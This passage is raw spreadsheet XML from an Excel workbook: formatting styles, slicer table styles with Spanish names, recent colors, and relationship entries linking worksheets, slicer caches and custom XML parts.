      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="27" formatCode="d/mm/yyyy\ hh:mm"/>
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>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dddd\ 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dddd\ dd\-mm\-yyyy"/>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scheme val="minor"/>
      </font>
      <alignment horizontal="center" textRotation="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7"/>
        <color indexed="8"/>
        <name val="Calibri"/>
        <scheme val="minor"/>
      </font>
      <numFmt numFmtId="0" formatCode="General"/>
    </dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="7"/>
        <color indexed="8"/>
        <name val="Calibri"/>
        <scheme val="minor"/>
      </font>
    </dxf>
    <dxf>
      <numFmt numFmtId="166" formatCode="d/mm/yyyy\ hh:mm:ss"/>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2" formatCode="0.00"/>
      <alignment horizontal="center" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color auto="1"/>
        <name val="Dialog"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="169" formatCode="0.0000000"/>
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color auto="1"/>
        <name val="Dialog"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="169" formatCode="0.0000000"/>
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="167" formatCode="m/d/yyyy\ h:mm\ AM/PM"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="167" formatCode="m/d/yyyy\ h:mm\ AM/PM"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="167" formatCode="m/d/yyyy\ h:mm\ AM/PM"/>
    </dxf>
    <dxf>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scheme val="minor"/>
      </font>
      <numFmt numFmtId="164" formatCode="0.0000000000000"/>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="8"/>
        <color indexed="8"/>
        <name val="Calibri"/>
        <scheme val="minor"/>
      </font>
      <numFmt numFmtId="164" formatCode="0.0000000000000"/>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="8"/>
        <color indexed="8"/>
        <name val="Calibri"/>
        <scheme val="minor"/>
      </font>
      <numFmt numFmtId="164" formatCode="0.0000000000000"/>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="8"/>
        <color indexed="8"/>
        <name val="Calibri"/>
        <scheme val="minor"/>
      </font>
      <numFmt numFmtId="31" formatCode="[h]:mm:ss"/>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="8"/>
        <color indexed="8"/>
        <name val="Calibri"/>
        <scheme val="minor"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="8"/>
        <color indexed="8"/>
        <name val="Calibri"/>
        <scheme val="minor"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="8"/>
        <color indexed="8"/>
        <name val="Calibri"/>
        <scheme val="minor"/>
      </font>
    </dxf>
    <dxf>
      <numFmt numFmtId="27" formatCode="d/mm/yyyy\ hh:mm"/>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="27" formatCode="d/mm/yyyy\ hh:mm"/>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ont>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertic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font>
        <b/>
        <sz val="16"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="16"/>
      </font>
    </dxf>
    <dxf>
      <alignment horizontal="left"/>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>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ont>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="top"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment textRotatio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3" tint="0.39997558519241921"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="2" tint="-0.249977111117893"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
      <alignment textRotation="90"/>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <alignment textRotation="90"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <bgColor theme="6" tint="0.39997558519241921"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment wrapText="0"/>
    </dxf>
    <dxf>
      <alignment wrapText="0"/>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="16"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="16"/>
      </font>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="left"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>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3" tint="0.39997558519241921"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="2" tint="-0.249977111117893"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
      <alignment textRotation="90"/>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <alignment textRotation="90"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment wrapText="0"/>
    </dxf>
    <dxf>
      <alignment wrapText="0"/>
    </dxf>
    <dxf>
      <alignment wrapText="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <bgColor theme="6" tint="0.39997558519241921"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment wrapText="0"/>
    </dxf>
    <dxf>
      <alignment wrapText="0"/>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="16"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="16"/>
      </font>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="left"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>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border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
        <right style="medium">
          <color indexed="64"/>
        </right>
      </border>
    </dxf>
    <dxf>
      <border>
        <left/>
        <right/>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left style="medium">
          <color indexed="64"/>
        </left>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <right style="medium">
          <color indexed="64"/>
        </right>
      </border>
    </dxf>
    <dxf>
      <font>
        <color theme="1" tint="0.499984740745262"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color theme="1" tint="0.499984740745262"/>
      </font>
    </dxf>
    <dxf>
      <alignment textRotation="0"/>
    </dxf>
    <dxf>
      <alignment textRotation="0"/>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border>
        <lef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ttom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <left/>
        <right/>
        <top/>
      </border>
    </dxf>
    <dxf>
      <border>
        <left/>
        <right/>
        <top/>
      </border>
    </dxf>
    <dxf>
      <font>
        <sz val="6"/>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numFmt numFmtId="14" formatCode="0.00%"/>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
      </border>
    </dxf>
    <dxf>
      <border>
        <right/>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alignment textRotation="90"/>
    </dxf>
    <dxf>
      <alignment textRotation="90"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <border>
        <left/>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8"/>
      </font>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <font>
        <b/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="12"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="12"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
      </font>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
        <right style="medium">
          <color indexed="64"/>
        </right>
      </border>
    </dxf>
    <dxf>
      <border>
        <left/>
        <right/>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sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
    </dxf>
    <dxf>
      <alignment textRotation="0"/>
    </dxf>
    <dxf>
      <alignment textRotation="0"/>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border>
        <lef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top style="medium">
          <color indexed="64"/>
        </top>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <left/>
        <right/>
        <top/>
      </border>
    </dxf>
    <dxf>
      <border>
        <left/>
        <right/>
        <top/>
      </border>
    </dxf>
    <dxf>
      <font>
        <sz val="6"/>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border>
        <left style="medium">
          <color indexed="64"/>
        </left>
      </border>
    </dxf>
    <dxf>
      <border>
        <right/>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alignment textRotation="90"/>
    </dxf>
    <dxf>
      <alignment textRotation="90"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <border>
        <left/>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font>
        <b/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="12"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="12"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
      </font>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>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rder>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <border>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
        <top style="medium">
          <color indexed="64"/>
        </top>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
        <right style="medium">
          <color indexed="64"/>
        </right>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
        <top style="medium">
          <color indexed="64"/>
        </top>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <left/>
        <right/>
        <top/>
      </border>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
    </dxf>
    <dxf>
      <alignment textRotation="0"/>
    </dxf>
    <dxf>
      <alignment textRotation="0"/>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border>
        <lef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rder>
    </dxf>
    <dxf>
      <font>
        <sz val="6"/>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border>
        <right/>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alignment textRotation="90"/>
    </dxf>
    <dxf>
      <alignment textRotation="90"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <border>
        <left/>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border>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
        <right style="medium">
          <color indexed="64"/>
        </right>
        <top style="medium">
          <color indexed="64"/>
        </top>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border>
        <right/>
        <top/>
      </border>
    </dxf>
    <dxf>
      <border>
        <right style="medium">
          <color indexed="64"/>
        </right>
      </border>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
      </border>
    </dxf>
    <dxf>
      <border>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>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top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
        <top style="medium">
          <color indexed="64"/>
        </top>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <border>
        <right style="medium">
          <color indexed="64"/>
        </right>
      </border>
    </dxf>
    <dxf>
      <border>
        <right style="medium">
          <color indexed="64"/>
        </right>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right/>
        <top/>
      </border>
    </dxf>
    <dxf>
      <font>
        <color theme="1" tint="0.499984740745262"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color theme="1" tint="0.499984740745262"/>
      </font>
    </dxf>
    <dxf>
      <alignment textRotation="0"/>
    </dxf>
    <dxf>
      <alignment textRotation="0"/>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border>
        <lef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rder>
    </dxf>
    <dxf>
      <font>
        <sz val="6"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>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numFmt numFmtId="14" formatCode="0.00%"/>
    </dxf>
    <dxf>
      <border>
        <right/>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alignment textRotation="90"/>
    </dxf>
    <dxf>
      <alignment textRotation="90"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <border>
        <left/>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border>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
        <right style="medium">
          <color indexed="64"/>
        </right>
        <top style="medium">
          <color indexed="64"/>
        </top>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <font>
        <sz val="18"/>
      </font>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <sz val="6"/>
        <color theme="1"/>
      </font>
      <border>
        <bottom style="thin">
          <color theme="4"/>
        </bottom>
        <vertical/>
        <horizontal/>
      </border>
    </dxf>
    <dxf>
      <font>
        <sz val="6"/>
        <color theme="1"/>
      </font>
      <border>
        <left style="thin">
          <color theme="4"/>
        </left>
        <right style="thin">
          <color theme="4"/>
        </right>
        <top style="thin">
          <color theme="4"/>
        </top>
        <bottom style="thin">
          <color theme="4"/>
        </bottom>
        <vertical/>
        <horizontal/>
      </border>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
  </dxfs>
  <tableStyles count="3" defaultTableStyle="TableStyleMedium2" defaultPivotStyle="PivotStyleLight16">
    <tableStyle name="Estilo de segmentación de datos 1" pivot="0" table="0" count="1" xr9:uid="{00000000-0011-0000-FFFF-FFFF00000000}">
      <tableStyleElement type="wholeTable" dxfId="1673"/>
    </tableStyle>
    <tableStyle name="Formato Segmentacion 1" pivot="0" table="0" count="10" xr9:uid="{00000000-0011-0000-FFFF-FFFF01000000}">
      <tableStyleElement type="wholeTable" dxfId="1672"/>
      <tableStyleElement type="headerRow" dxfId="1671"/>
    </tableStyle>
    <tableStyle name="Invisible" pivot="0" table="0" count="0" xr9:uid="{00000000-0011-0000-FFFF-FFFF02000000}"/>
  </tableStyles>
  <colors>
    <mruColors>
      <color rgb="FF4690EA"/>
      <color rgb="FF7D8487"/>
      <color rgb="FF626C70"/>
      <color rgb="FF9082A8"/>
    </mruColors>
  </colors>
  <extLst>
    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{46F421CA-312F-682f-3DD2-61675219B42D}">
      <x14:dxfs count="8">
        <dxf>
          <font>
            <sz val="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8"/>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8"/>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sz val="8"/>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8"/>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Formato Segmentacion 1">
        <x14:slicerStyle name="Estilo de segmentación de datos 1"/>
        <x14:slicerStyle name="Formato Segmentacion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microsoft.com/office/2007/relationships/slicerCache" Target="slicerCaches/slicerCache12.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item2.xml"/><Relationship Id="rId21" Type="http://schemas.microsoft.com/office/2007/relationships/slicerCache" Target="slicerCaches/slicerCache7.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/connections" Target="connection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07/relationships/slicerCache" Target="slicerCaches/slicerCache15.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet11.xml"/><Relationship Id="rId24" Type="http://schemas.microsoft.com/office/2007/relationships/slicerCache" Target="slicerCaches/slicerCache10.xml"/><Relationship Id="rId32" Type="http://schemas.microsoft.com/office/2007/relationships/slicerCache" Target="slicerCaches/slicerCache18.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5.xml"/><Relationship Id="rId31" Type="http://schemas.microsoft.com/office/2007/relationships/slicerCache" Target="slicerCaches/slicerCache17.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8.xml"/><Relationship Id="rId27" Type="http://schemas.microsoft.com/office/2007/relationships/slicerCache" Target="slicerCaches/slicerCache13.xml"/><Relationship Id="rId30" Type="http://schemas.microsoft.com/office/2007/relationships/slicerCache" Target="slicerCaches/slicerCache16.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.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theme" Target="theme/theme1.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item9.xml"/><Relationship Id="rId20" Type="http://schemas.microsoft.com/office/2007/relationships/slicerCache" Target="slicerCaches/slicerCache6.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microsoft.com/office/2007/relationships/slicerCache" Target="slicerCaches/slicerCache9.xml"/><Relationship Id="rId28" Type="http://schemas.microsoft.com/office/2007/relationships/slicerCache" Target="slicerCaches/slicerCache14.xml"/><Relationship Id="rId36" 